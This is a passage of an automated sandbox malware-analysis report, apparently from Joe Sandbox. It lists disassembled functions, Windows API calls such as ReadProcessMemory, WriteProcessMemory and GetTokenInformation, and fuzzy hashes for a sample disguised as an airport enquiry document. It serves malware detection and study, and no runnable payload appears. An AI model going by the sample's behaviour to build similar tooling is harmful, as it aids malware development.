            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ObjectSelect$BeginCreatePath
            • String ID:
            • API String ID: 3225163088-0
            • Opcode ID: 33307bb12aba419d22f2c2ed86c8f6506a0424461580e002fc9ee5f22a1c2274
            • Instruction ID: d11311a4f4cdbb1a9eeb06be839ec4cd42b29c00f03af12edad0e6c6f9f3b1c7
            • Opcode Fuzzy Hash: 33307bb12aba419d22f2c2ed86c8f6506a0424461580e002fc9ee5f22a1c2274
            • Instruction Fuzzy Hash: 97215174800308DBDB119F25DC047697BF8EB12326F184225F815D66F0D371D992DBA5
            Function 00CDC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memcmp
            • String ID:
            • API String ID: 2931989736-0
            • Opcode ID: 595d6fe48f69eb5e1db358cdd9a311bac1207c8613176ec7ad8e9850e617b6f6
            • Instruction ID: 719c8e3000fcea4e7186df3bcfbdd5d83c588fb0cf45025de33e21e061615d56
            • Opcode Fuzzy Hash: 595d6fe48f69eb5e1db358cdd9a311bac1207c8613176ec7ad8e9850e617b6f6
            • Instruction Fuzzy Hash: 330196716042277BD204A5215CC2EFF635DDF22398F084112FF14D6343EA61DE25D2E1
            Function 00CE4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
            Download Yara Rule
            APIs
            • GetCurrentThreadId.KERNEL32 ref: 00CE4D5C
            • __beginthreadex.LIBCMT ref: 00CE4D7A
            • MessageBoxW.USER32(?,?,?,?), ref: 00CE4D8F
            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00CE4DA5
            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00CE4DAC
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
            • String ID:
            • API String ID: 3824534824-0
            • Opcode ID: 54f175512d4fbda2778187d54c28fa64b0c0b43b3008b5b8deaae934cfd7376a
            • Instruction ID: ca9650b7de557a0437a8383bde1a489a6a866042f9715cfa83ee8968cd248b7d
            • Opcode Fuzzy Hash: 54f175512d4fbda2778187d54c28fa64b0c0b43b3008b5b8deaae934cfd7376a
            • Instruction Fuzzy Hash: B81144B6904348BFC7108FA9DC48A9A7FACEB46320F244269F928D3350C6B1CE0087B1
            Function 00CD874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
            Download Yara Rule
            APIs
            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CD8766
            • GetLastError.KERNEL32(?,00CD822A,?,?,?), ref: 00CD8770
            • GetProcessHeap.KERNEL32(00000008,?,?,00CD822A,?,?,?), ref: 00CD877F
            • HeapAlloc.KERNEL32(00000000,?,00CD822A,?,?,?), ref: 00CD8786
            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00CD879D
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
            • String ID:
            • API String ID: 842720411-0
            • Opcode ID: 5967624f1f9a219c898475708c9ea778eaf1cd3a46a8971ff23d8f1b281cdd08
            • Instruction ID: 1facd924a1107aebebe55e5a98de121e506245508cb4c6db0fd0951e4f92f915
            • Opcode Fuzzy Hash: 5967624f1f9a219c898475708c9ea778eaf1cd3a46a8971ff23d8f1b281cdd08
            • Instruction Fuzzy Hash: AE014B71600304EFDB204FA6DC88E6B7BACEF89355720042AF94DC2360DA329D04CA70
            Function 00CE54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
            Download Yara Rule
            APIs
            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CE5502
            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00CE5510
            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CE5518
            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00CE5522
            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CE555E
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: PerformanceQuery$CounterSleep$Frequency
            • String ID:
            • API String ID: 2833360925-0
            • Opcode ID: be9fbd03d6d3afcc3f2a839c98f018995bcf4f941e4be979fdf38d3cf18ba2f3
            • Instruction ID: 17be1a4a95fec1ced5a04cd42b477e2c53bb3415ff1d7b06ba1d57bc354102c4
            • Opcode Fuzzy Hash: be9fbd03d6d3afcc3f2a839c98f018995bcf4f941e4be979fdf38d3cf18ba2f3
            • Instruction Fuzzy Hash: 61015B32D01B19DBCF10DFEAE8886EDBB79BB09705F500056E805F2640DB309650C7A2
            Function 00CD7652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
            Download Yara Rule
            APIs
            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CD758C,80070057,?,?,?,00CD799D), ref: 00CD766F
            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CD758C,80070057,?,?), ref: 00CD768A
            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CD758C,80070057,?,?), ref: 00CD7698
            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CD758C,80070057,?), ref: 00CD76A8
            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CD758C,80070057,?,?), ref: 00CD76B4
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: From$Prog$FreeStringTasklstrcmpi
            • String ID:
            • API String ID: 3897988419-0
            • Opcode ID: dbbad12e0d183b90cf57414535db8204832072010200fe6dc90a83096a20f76d
            • Instruction ID: 48fd74afd87dfb58febdf3a5543214073bb8722c88ec93a7be942b392b950610
            • Opcode Fuzzy Hash: dbbad12e0d183b90cf57414535db8204832072010200fe6dc90a83096a20f76d
            • Instruction Fuzzy Hash: DD0171B2601704ABDB209F58DC48BAE7BADEB44751F24412AFE08D2321F731DE4197B0
            Function 00CD85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
            Download Yara Rule
            APIs
            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00CD8608
            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00CD8612
            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00CD8621
            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00CD8628
            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00CD863E
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: HeapInformationToken$AllocErrorLastProcess
            • String ID:
            • API String ID: 44706859-0
            • Opcode ID: 6734796ef6cba41409139b433617629c60a89e68ad5ff25e0d08d11070e2e369
            • Instruction ID: 54fe7b8b10b0981f3c3a6f4d76a43d44f568cb785d71d33fa4f2edb217dff839
            • Opcode Fuzzy Hash: 6734796ef6cba41409139b433617629c60a89e68ad5ff25e0d08d11070e2e369
            • Instruction Fuzzy Hash: BCF04F31205304AFEB200FA9DC89F6B3BACEF89764B10442AFA49C6250CB61DD46DA70
            Function 00CD8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
            Download Yara Rule
            APIs
            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00CD8669
            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00CD8673
            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CD8682
            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00CD8689
            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CD869F
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: HeapInformationToken$AllocErrorLastProcess
            • String ID:
            • API String ID: 44706859-0
            • Opcode ID: 2c52accddcf5d963f71ab5281fa766aca90840e771b67ddc80915883851bbfa0
            • Instruction ID: f7ea40f3fdb6b5fc6e109e46e2b41bbef5edf6dbabbab953d806932778629d04
            • Opcode Fuzzy Hash: 2c52accddcf5d963f71ab5281fa766aca90840e771b67ddc80915883851bbfa0
            • Instruction Fuzzy Hash: 9AF04F71240304BFEB211FA5ECC9F673BACEF89764B20002AFA59C7250CA65D945DA70
            Function 00CDC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
            Download Yara Rule
            APIs
            • GetDlgItem.USER32(?,000003E9), ref: 00CDC6BA
            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00CDC6D1
            • MessageBeep.USER32(00000000), ref: 00CDC6E9
            • KillTimer.USER32(?,0000040A), ref: 00CDC705
            • EndDialog.USER32(?,00000001), ref: 00CDC71F
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: BeepDialogItemKillMessageTextTimerWindow
            • String ID:
            • API String ID: 3741023627-0
            • Opcode ID: e192460b0c8e7c48ace0fc9c9a4b5307c397bc18d8417beb7637f96494053036
            • Instruction ID: 83f0dfceaf24a11f14c2e8a3f3de6bedddcf69b7864ad2323fb99aa027ad8710
            • Opcode Fuzzy Hash: e192460b0c8e7c48ace0fc9c9a4b5307c397bc18d8417beb7637f96494053036
            • Instruction Fuzzy Hash: 72018F30400305ABEB315B20DC8EB9677B8FB00705F14066AB696E16E0DBE1A955CB90
            Function 00C813B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
            Download Yara Rule
            APIs
            • EndPath.GDI32(?), ref: 00C813BF
            • StrokeAndFillPath.GDI32(?,?,00CBBAD8,00000000,?), ref: 00C813DB
            • SelectObject.GDI32(?,00000000), ref: 00C813EE
            • DeleteObject.GDI32 ref: 00C81401
            • StrokePath.GDI32(?), ref: 00C8141C
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Path$ObjectStroke$DeleteFillSelect
            • String ID:
            • API String ID: 2625713937-0
            • Opcode ID: 37633d2873c2d421158eeed5da42fab8fb2b36aa0c58742b18969a306f3d9289
            • Instruction ID: 62901f587da88b4c9a1de884985f0265568366c9eded70dd79b049e441fed2a5
            • Opcode Fuzzy Hash: 37633d2873c2d421158eeed5da42fab8fb2b36aa0c58742b18969a306f3d9289
            • Instruction Fuzzy Hash: 96F0CD74004308DBDB215F16EC0C7543BE9A742326F58C224E92AC56F1C7318596DF75
            Function 00CEC602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
            Download Yara Rule
            APIs
            • CoInitialize.OLE32(00000000), ref: 00CEC69D
            • CoCreateInstance.OLE32(00D12D6C,00000000,00000001,00D12BDC,?), ref: 00CEC6B5
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
            • CoUninitialize.OLE32 ref: 00CEC922
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CreateInitializeInstanceUninitialize_memmove
            • String ID: .lnk
            • API String ID: 2683427295-24824748
            • Opcode ID: a169fce4a6840c5ca17d6cef72c4e88dde8aa5fbbab2c95499ad021470ae14e4
            • Instruction ID: 1342ed7cc959f576b27caba3f70b51b60dde513b8fd56fa48493019d9a659771
            • Opcode Fuzzy Hash: a169fce4a6840c5ca17d6cef72c4e88dde8aa5fbbab2c95499ad021470ae14e4
            • Instruction Fuzzy Hash: 5FA12B71108205AFD304EF54C8C1EABB7E8EF88708F14491CF156971A2EB71EA49DB66
            Function 00C92E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00CA0FF6: std::exception::exception.LIBCMT ref: 00CA102C
              • Part of subcall function 00CA0FF6: __CxxThrowException@8.LIBCMT ref: 00CA1041
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
              • Part of subcall function 00C87BB1: _memmove.LIBCMT ref: 00C87C0B
            • __swprintf.LIBCMT ref: 00C9302D
            Strings
            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C92EC6
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
            • API String ID: 1943609520-557222456
            • Opcode ID: 0a46d86792c126abe8d686c474328fa0b381304313ec0719ee8f41e5bbd0a8e7
            • Instruction ID: 4a43176e833aa27d4e626a553f2c82bf95d2460a1c22c66b7a461483e922c952
            • Opcode Fuzzy Hash: 0a46d86792c126abe8d686c474328fa0b381304313ec0719ee8f41e5bbd0a8e7
            • Instruction Fuzzy Hash: 1E91AB31108241AFCB28FF64D989D6EB7A4EF85744F04091DF4929B2A1EB70EE44DB56
            Function 00CEBBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C848A1,?,?,00C837C0,?), ref: 00C848CE
            • CoInitialize.OLE32(00000000), ref: 00CEBC26
            • CoCreateInstance.OLE32(00D12D6C,00000000,00000001,00D12BDC,?), ref: 00CEBC3F
            • CoUninitialize.OLE32 ref: 00CEBC5C
              • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
              • Part of subcall function 00C89997: __swprintf.LIBCMT ref: 00C89A0C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
            • String ID: .lnk
            • API String ID: 2126378814-24824748
            • Opcode ID: a32a26f90c8c3d346907ed2edb151145e2a9cea86cefe28dcef4c44fba6f6504
            • Instruction ID: 91d935a439d9b87480a34586925db6486830ac86c1de595e02d88cc75bda0d21
            • Opcode Fuzzy Hash: a32a26f90c8c3d346907ed2edb151145e2a9cea86cefe28dcef4c44fba6f6504
            • Instruction Fuzzy Hash: 83A158756043419FCB14EF15C884D6ABBE5FF88318F148998F89A9B3A1CB31EE45CB91
            Function 00CA524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
            Download Yara Rule
            APIs
            • __startOneArgErrorHandling.LIBCMT ref: 00CA52DD
              • Part of subcall function 00CB0340: __87except.LIBCMT ref: 00CB037B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ErrorHandling__87except__start
            • String ID: pow
            • API String ID: 2905807303-2276729525
            • Opcode ID: 800719df98aa32e4bfadb7e98f98d178c90deb9655b45de22c91e09d1a27e729
            • Instruction ID: d8c9c29dbc4f29cb9cbe3bb9b9014c5df37e9c821bea98bb616b3ec867703e42
            • Opcode Fuzzy Hash: 800719df98aa32e4bfadb7e98f98d178c90deb9655b45de22c91e09d1a27e729
            • Instruction Fuzzy Hash: 4D515A61A0DB0297CB116714CA413FF2BE49B41754F30CE68E4A5822F9EF748ED4EE96
            Function 00CA023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID: #$+
            • API String ID: 0-2552117581
            • Opcode ID: f67df70f3caa8942198be79c195a2c9ad2307381e3897993730db454f31819a1
            • Instruction ID: 50eee3364e1d77ebc00e052aebd4a008ae646b4b007f45041c86911e5675edc7
            • Opcode Fuzzy Hash: f67df70f3caa8942198be79c195a2c9ad2307381e3897993730db454f31819a1
            • Instruction Fuzzy Hash: E25123755052468FCF25EF28C4886FA7BA6EF26310F244056EDA19B3A0D730DE42DB71
            Function 00C962F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memset$_memmove
            • String ID: ERCP
            • API String ID: 2532777613-1384759551
            • Opcode ID: 32da04e5900befd5ad182e9bc31ab60d794e6e4e896ba76c748476e03ca90a5a
            • Instruction ID: 6e3397c83494db79606698ad06d8d8851c0db9cd5c104c478e904b34b11c46ab
            • Opcode Fuzzy Hash: 32da04e5900befd5ad182e9bc31ab60d794e6e4e896ba76c748476e03ca90a5a
            • Instruction Fuzzy Hash: 7B51B2719007099BDB24CFA5C8857AABBF4FF04714F24856EEA5ACB281E771D684CB50
            Function 00CD9CD7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00CE19CC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CD9778,?,?,00000034,00000800,?,00000034), ref: 00CE19F6
            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00CD9D21
              • Part of subcall function 00CE1997: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CD97A7,?,?,00000800,?,00001073,00000000,?,?), ref: 00CE19C1
              • Part of subcall function 00CE18EE: GetWindowThreadProcessId.USER32(?,?), ref: 00CE1919
              • Part of subcall function 00CE18EE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00CD973C,00000034,?,?,00001004,00000000,00000000), ref: 00CE1929
